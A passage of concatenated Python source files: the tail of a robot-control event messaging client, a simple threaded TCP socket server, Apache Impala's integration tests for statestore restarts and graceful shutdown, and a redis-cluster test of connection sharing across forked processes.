logger.info('TASK ID = ' + str(event_task['task_id']) + ' ALREADY FINISH.')
self.already_finish_task_identify_set.add(identify)
duss_result = rm_define.DUSS_TASK_FINISHED
else:
logger.warn('UNSUPPORT TASK RESULT')
duss_result = rm_define.DUSS_ERR_FAILURE
else:
logger.error('RETURN CODE ERROR')
duss_result = rm_define.DUSS_ERR_FAILURE
return duss_result, identify
def task_sync_process(self, identify, task_push_msg):
task_push_msg['task_id'] = task_push_msg['data'][0]
task_push_msg['result'] = task_push_msg['data'][2] & 0x3
task_push_msg['fail_reason'] = (task_push_msg['data'][2] >> 2) & 0x7
task_push_msg['percent'] = task_push_msg['data'][1]
self.script_state.set_block_running_percent(task_push_msg['percent'])
self.script_state.set_block_running_fail_reason_code(task_push_msg['fail_reason'])
logger.info(
'TASK ID = ' + str(task_push_msg['task_id']) + ', ' + str(task_push_msg['percent']) + '% STATE = ' + str(
task_push_msg['result']) + ' FAIL_REASON = ' + str(task_push_msg['fail_reason']))
self.event_watchdog_set(identify)
if task_push_msg['result'] != 0:
logger.info('TASK ID = ' + str(task_push_msg['task_id']) + ' FINISHED.')
if identify in self.already_finish_task_identify_set:
self.already_finish_task_identify_set.remove(identify)
else:
self.event_notify(identify)
def send_task_stop(self, event_msg, time_out=duml_cmdset.MSG_DEFAULT_TIMEOUT):
duss_result, resp = self.send_sync(event_msg, time_out)
return duss_result
def send_async(self):
# TODO
pass
def resp_ok(self, msg):
self.resp_retcode(msg, duml_cmdset.DUSS_MB_RET_OK)
def resp_retcode(self, msg, retcode):
event_msg = duss_event_msg.unpack2EventMsg(msg)
event_msg.clear()
event_msg.append('ret_code', 'uint8', retcode)
event_msg.sender, event_msg.receiver = event_msg.receiver, event_msg.sender
event_msg.cmd_type = duml_cmdset.ACK_PKG_TYPE
self.send_msg(event_msg)
def resp_event_msg(self, event_msg):
event_msg.sender, event_msg.receiver = event_msg.receiver, event_msg.sender
event_msg.cmd_type = duml_cmdset.ACK_PKG_TYPE
self.send_msg(event_msg)
def event_msg_invalid_check_callback_register(self, callback):
self.check_event_msg_invalid_callback = callback
def event_msg_invalid_check_callback_unregister(self):
self.check_event_msg_invalid_callback = None
def check_event_msg_invalid(self, event_msg):
if callable(self.check_event_msg_invalid_callback):
return self.check_event_msg_invalid_callback(event_msg)
else:
return False, None
|
server.py
|
# based on https://www.youtube.com/watch?v=3QiPPX-KeSc
import socket
import threading
HEADER = 64
PORT = 5050
# local IP address
SERVER = socket.gethostbyname(socket.gethostname())
print("Local IP address: ",SERVER)
print("host name: ",socket.gethostname())
ADDR = (SERVER, PORT)
FORMAT = 'utf-8'
DISCONNECT_MESSAGE = "!DISCONNECT"
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind(ADDR)
def handle_client(conn, addr):
print(f"[NEW CONNECTION] {addr} connected.")
connected = True
while connected:
msg_length = conn.recv(HEADER).decode(FORMAT)
if msg_length:
msg_length = int(msg_length)
msg = conn.recv(msg_length).decode(FORMAT)
if msg == DISCONNECT_MESSAGE:
connected = False
print(f"[{addr}] {msg}")
conn.close()
def start():
server.listen()
while True:
conn, addr = server.accept()
thread = threading.Thread(target=handle_client, args=(conn,addr))
thread.start()
print(f"[ACTIVE CONNECTIONS] {threading.activeCount()-1}")
print("[STARTING] server is starting...")
start()
|
test_restart_services.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import logging
import os
import pytest
import psutil
import re
import signal
import socket
import time
import threading
from subprocess import check_call
from tests.common.environ import build_flavor_timeout
from time import sleep
from impala.error import HiveServer2Error
from TCLIService import TCLIService
from beeswaxd.BeeswaxService import QueryState
from tests.beeswax.impala_beeswax import ImpalaBeeswaxException
from tests.common.custom_cluster_test_suite import CustomClusterTestSuite
from tests.common.skip import SkipIfNotHdfsMinicluster, SkipIfGCS
from tests.hs2.hs2_test_suite import HS2TestSuite, needs_session
LOG = logging.getLogger(__name__)
class TestRestart(CustomClusterTestSuite):
@classmethod
def get_workload(cls):
return 'functional-query'
@pytest.mark.execute_serially
def test_restart_statestore(self, cursor):
""" Regression test of IMPALA-6973. After the statestore restarts, the metadata should
eventually recover after being cleared by the new statestore.
"""
self.cluster.statestored.restart()
# We need to wait for the impalad to register to the new statestored and for a
# non-empty catalog update from the new statestored. It cannot be expressed with the
# existing metrics yet so we wait for some time here.
wait_time_s = build_flavor_timeout(60, slow_build_timeout=100)
sleep(wait_time_s)
for retry in xrange(wait_time_s):
try:
cursor.execute("describe database functional")
return
except HiveServer2Error, e:
assert "AnalysisException: Database does not exist: functional" in e.message,\
"Unexpected exception: " + e.message
sleep(1)
assert False, "Coordinator never received non-empty metadata from the restarted " \
"statestore after {0} seconds".format(wait_time_s)
@pytest.mark.execute_serially
def test_restart_impala(self):
""" This test aims to restart Impalad executor nodes between queries to exercise
the cluster membership callback which removes stale connections to the restarted
nodes."""
self._start_impala_cluster([], num_coordinators=1, cluster_size=3)
assert len(self.cluster.impalads) == 3
client = self.cluster.impalads[0].service.create_beeswax_client()
assert client is not None
for i in xrange(5):
self.execute_query_expect_success(client, "select * from functional.alltypes")
node_to_restart = 1 + (i % 2)
self.cluster.impalads[node_to_restart].restart()
# Sleep for a bit for the statestore change in membership to propagate. The min
# update frequency for statestore is 100ms but using a larger sleep time here
# as certain builds (e.g. ASAN) can be really slow.
sleep(3)
client.close()
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
# Debug action to delay statestore updates to give the restarted impalad time to
# register itself before a membership topic update is generated.
statestored_args="--debug_actions=DO_SUBSCRIBER_UPDATE:JITTER@10000")
def test_statestore_update_after_impalad_restart(self):
"""Test that checks that coordinators are informed that an impalad went down even if
the statestore doesn't send a membership update until after a new impalad has been
restarted at the same location."""
if self.exploration_strategy() != 'exhaustive':
pytest.skip()
assert len(self.cluster.impalads) == 3
client = self.cluster.impalads[0].service.create_beeswax_client()
assert client is not None
handle = client.execute_async(
"select count(*) from functional.alltypes where id = sleep(100000)")
node_to_restart = self.cluster.impalads[2]
node_to_restart.restart()
# Verify that the query is cancelled due to the failed impalad quickly.
self.wait_for_state(handle, QueryState.EXCEPTION, 20, client=client)
@pytest.mark.execute_serially
def test_catalog_connection_retries(self):
"""Test that connections to the catalogd are retried, both new connections and cached
connections."""
# Since this is a custom cluster test, each impalad should start off with no cached
# connections to the catalogd. So the first call to __test_catalog_connection_retries
# should test that new connections are retried.
coordinator_service = self.cluster.impalads[0].service
assert coordinator_service.get_metric_value(
"catalog.server.client-cache.total-clients") == 0
self.__test_catalog_connection_retries()
# Since a query was just run that required loading metadata from the catalogd, there
# should be a cached connection to the catalogd, so the second call to
# __test_catalog_connection_retries should assert that broken cached connections are
# retried.
assert coordinator_service.get_metric_value(
"catalog.server.client-cache.total-clients") == 1
self.__test_catalog_connection_retries()
def __test_catalog_connection_retries(self):
"""Test that a query retries connecting to the catalogd. Kills the catalogd, launches
a query that requires catalogd access, starts the catalogd, and then validates that
the query eventually finishes successfully."""
self.cluster.catalogd.kill_and_wait_for_exit()
query = "select * from functional.alltypes limit 10"
query_handle = []
# self.execute_query_async has to be run in a dedicated thread because it does not
# truly run a query asynchronously. The query compilation has to complete before
# execute_query_async can return. Since compilation requires catalogd access,
# execute_query_async won't return until the catalogd is up and running.
def execute_query_async():
query_handle.append(self.execute_query_async(query))
thread = threading.Thread(target=execute_query_async)
thread.start()
# Sleep until the query actually starts to try and access the catalogd. Set an
# explicitly high value to avoid any race conditions. The connection is retried 3
# times by default with a 10 second interval, so a high sleep time should not cause
# any timeouts.
sleep(5)
self.cluster.catalogd.start()
thread.join()
self.wait_for_state(query_handle[0], QueryState.FINISHED, 30000)
SUBSCRIBER_TIMEOUT_S = 2
CANCELLATION_GRACE_PERIOD_S = 5
@pytest.mark.execute_serially
@SkipIfNotHdfsMinicluster.scheduling
@CustomClusterTestSuite.with_args(
impalad_args="--statestore_subscriber_timeout_seconds={timeout_s} "
"--statestore_subscriber_recovery_grace_period_ms={recovery_period_ms}"
.format(timeout_s=SUBSCRIBER_TIMEOUT_S,
recovery_period_ms=(CANCELLATION_GRACE_PERIOD_S * 1000)),
catalogd_args="--statestore_subscriber_timeout_seconds={timeout_s}".format(
timeout_s=SUBSCRIBER_TIMEOUT_S))
def test_restart_statestore_query_resilience(self):
"""IMPALA-7665: Test that after restarting statestore a momentary inconsistent
cluster membership state will not result in query cancellation. Also make sure that
queries get cancelled if a backend actually went down while the statestore was
down or during the grace period."""
slow_query = \
"select distinct * from tpch_parquet.lineitem where l_orderkey > sleep(1000)"
impalad = self.cluster.impalads[0]
client = impalad.service.create_beeswax_client()
try:
handle = client.execute_async(slow_query)
# Make sure query starts running.
self.wait_for_state(handle, QueryState.RUNNING, 1000)
profile = client.get_runtime_profile(handle)
assert "NumBackends: 3" in profile, profile
# Restart Statestore and wait till the grace period ends + some buffer.
self.cluster.statestored.restart()
self.cluster.statestored.service.wait_for_live_subscribers(4)
sleep(self.CANCELLATION_GRACE_PERIOD_S + 1)
assert client.get_state(handle) == QueryState.RUNNING
# Now restart statestore and kill a backend while it is down, and make sure the
# query fails when it comes back up.
start_time = time.time()
self.cluster.statestored.kill()
self.cluster.impalads[1].kill()
self.cluster.statestored.start()
try:
client.wait_for_finished_timeout(handle, 100)
assert False, "Query expected to fail"
except ImpalaBeeswaxException as e:
assert "Failed due to unreachable impalad" in str(e), str(e)
assert time.time() - start_time > self.CANCELLATION_GRACE_PERIOD_S + \
self.SUBSCRIBER_TIMEOUT_S, \
"Query got cancelled earlier than the cancellation grace period"
# Now restart statestore and kill a backend after it comes back up, and make sure
# the query eventually fails.
# Make sure the new statestore has received update from catalog and sent it to the
# impalad.
catalogd_version = self.cluster.catalogd.service.get_catalog_version()
impalad.service.wait_for_metric_value("catalog.curr-version", catalogd_version)
handle = client.execute_async(slow_query)
self.wait_for_state(handle, QueryState.RUNNING, 1000)
profile = client.get_runtime_profile(handle)
assert "NumBackends: 2" in profile, profile
start_time = time.time()
self.cluster.statestored.restart()
# Make sure it has connected to the impalads before killing one.
self.cluster.statestored.service.wait_for_live_subscribers(3)
self.cluster.impalads[2].kill()
try:
client.wait_for_finished_timeout(handle, 100)
assert False, "Query expected to fail"
except ImpalaBeeswaxException as e:
assert "Failed due to unreachable impalad" in str(e), str(e)
assert time.time() - start_time > self.CANCELLATION_GRACE_PERIOD_S + \
self.SUBSCRIBER_TIMEOUT_S, \
"Query got cancelled earlier than the cancellation grace period"
finally:
client.close()
def parse_shutdown_result(result):
"""Parse the shutdown result string and return the strings (grace left,
deadline left, queries registered, queries executing)."""
assert len(result.data) == 1
summary = result.data[0]
match = re.match(r'shutdown grace period left: ([0-9ms]*), deadline left: ([0-9ms]*), '
r'queries registered on coordinator: ([0-9]*), queries executing: '
r'([0-9]*), fragment instances: [0-9]*', summary)
assert match is not None, summary
return match.groups()
class TestGracefulShutdown(CustomClusterTestSuite, HS2TestSuite):
IDLE_SHUTDOWN_GRACE_PERIOD_S = 1
IMPALA_SHUTDOWN_SIGNAL = signal.SIGRTMIN
@classmethod
def get_workload(cls):
return 'functional-query'
@SkipIfGCS.jira(reason="IMPALA-10562")
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args="--shutdown_grace_period_s={grace_period} \
--hostname={hostname}".format(grace_period=IDLE_SHUTDOWN_GRACE_PERIOD_S,
hostname=socket.gethostname()))
def test_shutdown_idle(self):
"""Test that idle impalads shut down in a timely manner after the shutdown grace
period elapses."""
impalad1 = psutil.Process(self.cluster.impalads[0].get_pid())
impalad2 = psutil.Process(self.cluster.impalads[1].get_pid())
impalad3 = psutil.Process(self.cluster.impalads[2].get_pid())
# Test that a failed shut down from a bogus host or port fails gracefully.
ex = self.execute_query_expect_failure(self.client,
":shutdown('e6c00ca5cd67b567eb96c6ecfb26f05')")
assert "Could not find IPv4 address for:" in str(ex)
ex = self.execute_query_expect_failure(self.client, ":shutdown('localhost:100000')")
assert "invalid port:" in str(ex)
assert ("This may be because the port specified is wrong.") not in str(ex)
# Test that pointing to the wrong thrift service (the HS2 port) fails gracefully-ish.
thrift_port = 21051 # HS2 port.
ex = self.execute_query_expect_failure(self.client,
":shutdown('localhost:{0}')".format(thrift_port))
assert ("failed with error 'RemoteShutdown() RPC failed") in str(ex)
assert ("This may be because the port specified is wrong.") in str(ex)
# Test RPC error handling with debug action.
ex = self.execute_query_expect_failure(self.client, ":shutdown('localhost:27001')",
query_options={'debug_action': 'CRS_SHUTDOWN_RPC:FAIL'})
assert 'Rpc to 127.0.0.1:27001 failed with error \'Debug Action: ' \
'CRS_SHUTDOWN_RPC:FAIL' in str(ex)
# Test remote shutdown.
LOG.info("Start remote shutdown {0}".format(time.time()))
self.execute_query_expect_success(self.client, ":shutdown('localhost:27001')",
query_options={})
# Remote shutdown does not require statestore.
self.cluster.statestored.kill()
self.cluster.statestored.wait_for_exit()
self.execute_query_expect_success(self.client, ":shutdown('localhost:27002')",
query_options={})
# Test local shutdown, which should succeed even with injected RPC error.
LOG.info("Start local shutdown {0}".format(time.time()))
self.execute_query_expect_success(self.client,
":shutdown('{0}:27000')".format(socket.gethostname()),
query_options={'debug_action': 'CRS_SHUTDOWN_RPC:FAIL'})
# Make sure that the impala daemons exit after the shutdown grace period plus a 10
# second margin of error.
start_time = time.time()
LOG.info("Waiting for impalads to exit {0}".format(start_time))
impalad1.wait()
LOG.info("First impalad exited {0}".format(time.time()))
impalad2.wait()
LOG.info("Second impalad exited {0}".format(time.time()))
impalad3.wait()
LOG.info("Third impalad exited {0}".format(time.time()))
shutdown_duration = time.time() - start_time
assert shutdown_duration <= self.IDLE_SHUTDOWN_GRACE_PERIOD_S + 10
EXEC_SHUTDOWN_GRACE_PERIOD_S = 5
EXEC_SHUTDOWN_DEADLINE_S = 10
@pytest.mark.execute_serially
@SkipIfNotHdfsMinicluster.scheduling
@CustomClusterTestSuite.with_args(
impalad_args="--shutdown_grace_period_s={grace_period} \
--shutdown_deadline_s={deadline} \
--hostname={hostname}".format(grace_period=EXEC_SHUTDOWN_GRACE_PERIOD_S,
deadline=EXEC_SHUTDOWN_DEADLINE_S, hostname=socket.gethostname()))
def test_shutdown_executor(self):
self.do_test_shutdown_executor(fetch_delay_s=0)
@pytest.mark.execute_serially
@SkipIfNotHdfsMinicluster.scheduling
@CustomClusterTestSuite.with_args(
impalad_args="--shutdown_grace_period_s={grace_period} \
--shutdown_deadline_s={deadline} \
--stress_status_report_delay_ms={status_report_delay_ms} \
--hostname={hostname}".format(grace_period=EXEC_SHUTDOWN_GRACE_PERIOD_S,
deadline=EXEC_SHUTDOWN_DEADLINE_S, status_report_delay_ms=5000,
hostname=socket.gethostname()))
def test_shutdown_executor_with_delay(self):
"""Regression test for IMPALA-7931 that adds delays to status reporting and
to fetching of results to trigger races that previously resulted in query failures."""
print self.exploration_strategy
if self.exploration_strategy() != 'exhaustive':
pytest.skip()
self.do_test_shutdown_executor(fetch_delay_s=5)
def do_test_shutdown_executor(self, fetch_delay_s):
"""Implementation of test that shuts down and then restarts an executor. This should
not disrupt any queries that start after the shutdown or complete before the shutdown
time limit. The test is parameterized by 'fetch_delay_s', the amount to delay before
fetching from the query that must survive shutdown of an executor."""
# Add sleeps to make sure that the query takes a couple of seconds to execute on the
# executors.
QUERY = "select count(*) from functional_parquet.alltypes where sleep(1) = bool_col"
# Subtle: use a splittable file format like text for lineitem so that each backend
# is guaranteed to get scan ranges that contain some actual rows. With Parquet on
# S3, the files get broken into 32MB scan ranges and a backend might get unlucky
# and only get scan ranges that don't contain the midpoint of any row group, and
# therefore not actually produce any rows.
SLOW_QUERY = "select count(*) from tpch.lineitem where sleep(1) = l_orderkey"
SHUTDOWN_EXEC2 = ": shutdown('localhost:27001')"
# Run this query before shutdown and make sure that it executes successfully on
# all executors through the shutdown grace period without disruption.
before_shutdown_handle = self.__exec_and_wait_until_running(QUERY)
# Run this query which simulates getting stuck in admission control until after
# the shutdown grace period expires. This demonstrates that queries don't get
# cancelled if the cluster membership changes while they're waiting for admission.
before_shutdown_admission_handle = self.execute_query_async(QUERY,
{'debug_action': 'AC_BEFORE_ADMISSION:SLEEP@30000'})
# Shut down and wait for the shutdown state to propagate through statestore.
result = self.execute_query_expect_success(self.client, SHUTDOWN_EXEC2)
assert parse_shutdown_result(result) == (
"{0}s000ms".format(self.EXEC_SHUTDOWN_GRACE_PERIOD_S),
"{0}s000ms".format(self.EXEC_SHUTDOWN_DEADLINE_S), "0", "1")
# Check that the status is reflected on the debug page.
web_json = self.cluster.impalads[1].service.get_debug_webpage_json("")
assert web_json.get('is_quiescing', None) is True, web_json
assert 'shutdown_status' in web_json, web_json
self.impalad_test_service.wait_for_num_known_live_backends(2,
timeout=self.EXEC_SHUTDOWN_GRACE_PERIOD_S + 5, interval=0.2,
include_shutting_down=False)
# Run another query, which shouldn't get scheduled on the new executor. We'll let
# this query continue running through the full shutdown and restart cycle.
after_shutdown_handle = self.__exec_and_wait_until_running(QUERY)
# Wait for the impalad to exit, then start it back up and run another query, which
# should be scheduled on it again.
self.cluster.impalads[1].wait_for_exit()
# Finish fetching results from the first query (which will be buffered on the
# coordinator) after the backend exits. Add a delay before fetching to ensure
# that the query is not torn down on the coordinator when the failure is
# detected by the statestore (see IMPALA-7931).
assert self.__fetch_and_get_num_backends(
QUERY, before_shutdown_handle, delay_s=fetch_delay_s) == 3
# Confirm that the query stuck in admission succeeded.
assert self.__fetch_and_get_num_backends(
QUERY, before_shutdown_admission_handle, timeout_s=30) == 2
# Start the impalad back up and run another query, which should be scheduled on it
# again.
self.cluster.impalads[1].start()
self.impalad_test_service.wait_for_num_known_live_backends(
3, timeout=30, interval=0.2, include_shutting_down=False)
after_restart_handle = self.__exec_and_wait_until_running(QUERY)
# The query started while the backend was shut down should not run on that backend.
assert self.__fetch_and_get_num_backends(QUERY, after_shutdown_handle) == 2
assert self.__fetch_and_get_num_backends(QUERY, after_restart_handle) == 3
# Test that a query will fail when the executor shuts down after the limit.
deadline_expiry_handle = self.__exec_and_wait_until_running(SLOW_QUERY)
result = self.execute_query_expect_success(self.client, SHUTDOWN_EXEC2)
assert parse_shutdown_result(result) == (
"{0}s000ms".format(self.EXEC_SHUTDOWN_GRACE_PERIOD_S),
"{0}s000ms".format(self.EXEC_SHUTDOWN_DEADLINE_S), "0", "1")
self.cluster.impalads[1].wait_for_exit()
self.__check_deadline_expired(SLOW_QUERY, deadline_expiry_handle)
# Test that we can reduce the deadline after setting it to a high value.
# Run a query that will fail as a result of the reduced deadline.
deadline_expiry_handle = self.__exec_and_wait_until_running(SLOW_QUERY)
SHUTDOWN_EXEC3 = ": shutdown('localhost:27002', {0})"
VERY_HIGH_DEADLINE = 5000
HIGH_DEADLINE = 1000
LOW_DEADLINE = 5
result = self.execute_query_expect_success(
self.client, SHUTDOWN_EXEC3.format(HIGH_DEADLINE))
grace, deadline, _, _ = parse_shutdown_result(result)
assert grace == "{0}s000ms".format(self.EXEC_SHUTDOWN_GRACE_PERIOD_S)
assert deadline == "{0}m{1}s".format(HIGH_DEADLINE / 60, HIGH_DEADLINE % 60)
result = self.execute_query_expect_success(
self.client, SHUTDOWN_EXEC3.format(VERY_HIGH_DEADLINE))
_, deadline, _, _ = parse_shutdown_result(result)
LOG.info("Deadline is {0}".format(deadline))
min_string, sec_string = re.match("([0-9]*)m([0-9]*)s", deadline).groups()
assert int(min_string) * 60 + int(sec_string) <= HIGH_DEADLINE, \
"Cannot increase deadline " + deadline
result = self.execute_query_expect_success(
self.client, SHUTDOWN_EXEC3.format(LOW_DEADLINE))
_, deadline, _, queries_executing = parse_shutdown_result(result)
assert deadline == "{0}s000ms".format(LOW_DEADLINE)
assert int(queries_executing) > 0, "Slow query should still be running."
self.cluster.impalads[2].wait_for_exit()
self.__check_deadline_expired(SLOW_QUERY, deadline_expiry_handle)
COORD_SHUTDOWN_GRACE_PERIOD_S = 5
COORD_SHUTDOWN_DEADLINE_S = 120
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args="--shutdown_grace_period_s={grace_period} \
--shutdown_deadline_s={deadline} \
--hostname={hostname}".format(
grace_period=COORD_SHUTDOWN_GRACE_PERIOD_S,
deadline=COORD_SHUTDOWN_DEADLINE_S, hostname=socket.gethostname()),
default_query_options=[("num_scanner_threads", "1")])
@needs_session(TCLIService.TProtocolVersion.HIVE_CLI_SERVICE_PROTOCOL_V6,
close_session=False)
def test_shutdown_coordinator(self):
"""Test that shuts down the coordinator. Running queries should finish but new
requests should be rejected."""
# Start a query running. This should complete successfully and keep the coordinator
# up until it finishes. We set NUM_SCANNER_THREADS=1 above to make the runtime more
# predictable.
SLOW_QUERY = """select * from tpch_parquet.lineitem where sleep(1) < l_orderkey"""
SHUTDOWN = ": shutdown()"
SHUTDOWN_ERROR_PREFIX = 'Server is being shut down:'
before_shutdown_handle = self.__exec_and_wait_until_running(SLOW_QUERY)
before_shutdown_hs2_handle = self.execute_statement(SLOW_QUERY).operationHandle
# Shut down the coordinator. Operations that start after this point should fail.
result = self.execute_query_expect_success(self.client, SHUTDOWN)
grace, deadline, registered, _ = parse_shutdown_result(result)
assert grace == "{0}s000ms".format(self.COORD_SHUTDOWN_GRACE_PERIOD_S)
assert deadline == "{0}m".format(self.COORD_SHUTDOWN_DEADLINE_S / 60), "4"
assert registered == "3"
# Expect that the beeswax shutdown error occurs when calling fn()
def expect_beeswax_shutdown_error(fn):
try:
fn()
except ImpalaBeeswaxException, e:
assert SHUTDOWN_ERROR_PREFIX in str(e)
expect_beeswax_shutdown_error(lambda: self.client.execute("select 1"))
expect_beeswax_shutdown_error(lambda: self.client.execute_async("select 1"))
# Test that the HS2 shutdown error occurs for various HS2 operations.
self.execute_statement("select 1", None, TCLIService.TStatusCode.ERROR_STATUS,
SHUTDOWN_ERROR_PREFIX)
def check_hs2_shutdown_error(hs2_response):
HS2TestSuite.check_response(hs2_response, TCLIService.TStatusCode.ERROR_STATUS,
SHUTDOWN_ERROR_PREFIX)
check_hs2_shutdown_error(self.hs2_client.OpenSession(TCLIService.TOpenSessionReq()))
check_hs2_shutdown_error(self.hs2_client.GetInfo(TCLIService.TGetInfoReq(
self.session_handle, TCLIService.TGetInfoType.CLI_MAX_DRIVER_CONNECTIONS)))
check_hs2_shutdown_error(self.hs2_client.GetTypeInfo(
TCLIService.TGetTypeInfoReq(self.session_handle)))
check_hs2_shutdown_error(self.hs2_client.GetCatalogs(
TCLIService.TGetCatalogsReq(self.session_handle)))
check_hs2_shutdown_error(self.hs2_client.GetSchemas(
TCLIService.TGetSchemasReq(self.session_handle)))
check_hs2_shutdown_error(self.hs2_client.GetTables(
TCLIService.TGetTablesReq(self.session_handle)))
check_hs2_shutdown_error(self.hs2_client.GetTableTypes(
TCLIService.TGetTableTypesReq(self.session_handle)))
check_hs2_shutdown_error(self.hs2_client.GetColumns(
TCLIService.TGetColumnsReq(self.session_handle)))
check_hs2_shutdown_error(self.hs2_client.GetFunctions(
TCLIService.TGetFunctionsReq(self.session_handle, functionName="")))
# Operations on running HS2 query still work.
self.fetch_until(before_shutdown_hs2_handle,
TCLIService.TFetchOrientation.FETCH_NEXT, 10)
HS2TestSuite.check_response(self.hs2_client.CancelOperation(
TCLIService.TCancelOperationReq(before_shutdown_hs2_handle)))
HS2TestSuite.check_response(self.hs2_client.CloseOperation(
TCLIService.TCloseOperationReq(before_shutdown_hs2_handle)))
# Make sure that the beeswax query is still executing, then close it to allow the
# coordinator to shut down.
self.impalad_test_service.wait_for_query_state(self.client, before_shutdown_handle,
self.client.QUERY_STATES['FINISHED'], timeout=20)
self.client.close_query(before_shutdown_handle)
self.cluster.impalads[0].wait_for_exit()
def __exec_and_wait_until_running(self, query, timeout=20):
"""Execute 'query' with self.client and wait until it is in the RUNNING state.
'timeout' controls how long we will wait"""
# Fix number of scanner threads to make runtime more deterministic.
handle = self.execute_query_async(query, {'num_scanner_threads': 1})
self.impalad_test_service.wait_for_query_state(self.client, handle,
self.client.QUERY_STATES['RUNNING'], timeout=20)
return handle
def __fetch_and_get_num_backends(self, query, handle, delay_s=0, timeout_s=20):
"""Fetch the results of 'query' from the beeswax handle 'handle', close the
query and return the number of backends obtained from the profile."""
self.impalad_test_service.wait_for_query_state(self.client, handle,
self.client.QUERY_STATES['FINISHED'], timeout=timeout_s)
if delay_s > 0:
LOG.info("sleeping for {0}s".format(delay_s))
time.sleep(delay_s)
self.client.fetch(query, handle)
profile = self.client.get_runtime_profile(handle)
self.client.close_query(handle)
backends_match = re.search("NumBackends: ([0-9]*)", profile)
assert backends_match is not None, profile
return int(backends_match.group(1))
def __check_deadline_expired(self, query, handle):
"""Check that the query with 'handle' fails because of a backend hitting the
deadline and shutting down."""
try:
self.client.fetch(query, handle)
assert False, "Expected query to fail"
except Exception, e:
assert 'Failed due to unreachable impalad(s)' in str(e)
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args="--shutdown_grace_period_s={grace_period} \
--hostname={hostname}".format(grace_period=IDLE_SHUTDOWN_GRACE_PERIOD_S,
hostname=socket.gethostname()), cluster_size=1)
def test_shutdown_signal(self):
"""Test that an idle impalad shuts down in a timely manner after the shutdown grace
period elapses."""
impalad = psutil.Process(self.cluster.impalads[0].get_pid())
LOG.info(
"Sending IMPALA_SHUTDOWN_SIGNAL(SIGRTMIN = {0}) signal to impalad PID = {1}",
self.IMPALA_SHUTDOWN_SIGNAL, impalad.pid)
impalad.send_signal(self.IMPALA_SHUTDOWN_SIGNAL)
# Make sure that the impala daemon exits after the shutdown grace period plus a 10
# second margin of error.
start_time = time.time()
LOG.info("Waiting for impalad to exit {0}".format(start_time))
impalad.wait()
shutdown_duration = time.time() - start_time
assert shutdown_duration <= self.IDLE_SHUTDOWN_GRACE_PERIOD_S + 10
# Make sure signal was received and the grace period and deadline are as expected.
self.assert_impalad_log_contains('INFO',
"Shutdown signal received. Current Shutdown Status: shutdown grace period left: "
"{0}s000ms, deadline left: 8760h".format(self.IDLE_SHUTDOWN_GRACE_PERIOD_S))
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(cluster_size=1)
def test_sending_multiple_shutdown_signals(self):
"""Test that multiple IMPALA_SHUTDOWN_SIGNAL signals are all handeled without
crashing the process."""
impalad = psutil.Process(self.cluster.impalads[0].get_pid())
NUM_SIGNALS_TO_SEND = 10
LOG.info(
"Sending {0} IMPALA_SHUTDOWN_SIGNAL(SIGRTMIN = {1}) signals to impalad PID = {2}",
NUM_SIGNALS_TO_SEND, self.IMPALA_SHUTDOWN_SIGNAL, impalad.pid)
for i in range(NUM_SIGNALS_TO_SEND):
impalad.send_signal(self.IMPALA_SHUTDOWN_SIGNAL)
# Give shutdown thread some time to wake up and handle all the signals to avoid
# flakiness.
sleep(5)
# Make sure all signals were received and the process is still up.
self.assert_impalad_log_contains('INFO', "Shutdown signal received.",
NUM_SIGNALS_TO_SEND)
assert impalad.is_running(), "Impalad process should still be running."
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args="--shutdown_grace_period_s={grace_period} \
--hostname={hostname}".format(grace_period=IDLE_SHUTDOWN_GRACE_PERIOD_S,
hostname=socket.gethostname()), cluster_size=1)
def test_graceful_shutdown_script(self):
impalad = psutil.Process(self.cluster.impalads[0].get_pid())
script = os.path.join(os.environ['IMPALA_HOME'], 'bin',
'graceful_shutdown_backends.sh')
start_time = time.time()
check_call([script, str(self.IDLE_SHUTDOWN_GRACE_PERIOD_S)])
LOG.info("Waiting for impalad to exit {0}".format(start_time))
impalad.wait()
shutdown_duration = time.time() - start_time
assert shutdown_duration <= self.IDLE_SHUTDOWN_GRACE_PERIOD_S + 10
|
test_multiprocessing.py
|
import pytest
import multiprocessing
import contextlib
import redis
from rediscluster.connection import ClusterConnection, ClusterConnectionPool
from redis.exceptions import ConnectionError
from .conftest import _get_client
@contextlib.contextmanager
def exit_callback(callback, *args):
try:
yield
finally:
callback(*args)
class TestMultiprocessing(object):
# Test connection sharing between forks.
# See issue #1085 for details.
# use a multi-connection client as that's the only type that is
# actuall fork/process-safe
@pytest.fixture()
def r(self, request):
return _get_client(
redis.Redis,
request=request,
single_connection_client=False)
def test_close_connection_in_child(self):
"""
A connection owned by a parent and closed by a child doesn't
destroy the file descriptors so a parent can still use it.
"""
conn = ClusterConnection(port=7000)
conn.send_command('ping')
assert conn.read_response() == b'PONG'
def target(conn):
conn.send_command('ping')
assert conn.read_response() == b'PONG'
conn.disconnect()
proc = multiprocessing.Process(target=target, args=(conn,))
proc.start()
proc.join(3)
assert proc.exitcode == 0
# The connection was created in the parent but disconnected in the
# child. The child called socket.close() but did not call
# socket.shutdown() because it wasn't the "owning" process.
# Therefore the connection still works in the parent.
conn.send_command('ping')
assert conn.read_response() == b'PONG'
def test_close_connection_in_parent(self):
"""
A connection owned by a parent is unusable by a child if the parent
(the owning process) closes the connection.
"""
conn = ClusterConnection(port=7000)
conn.send_command('ping')
assert conn.read_response() == b'PONG'
def target(conn, ev):
ev.wait()
# the parent closed the connection. because it also created the
# connection, the connection is shutdown and the child
# cannot use it.
with pytest.raises(ConnectionError):
conn.send_command('ping')
ev = multiprocessing.Event()
proc = multiprocessing.Process(target=target, args=(conn, ev))
proc.start()
conn.disconnect()
ev.set()
proc.join(3)
assert proc.exitcode == 0
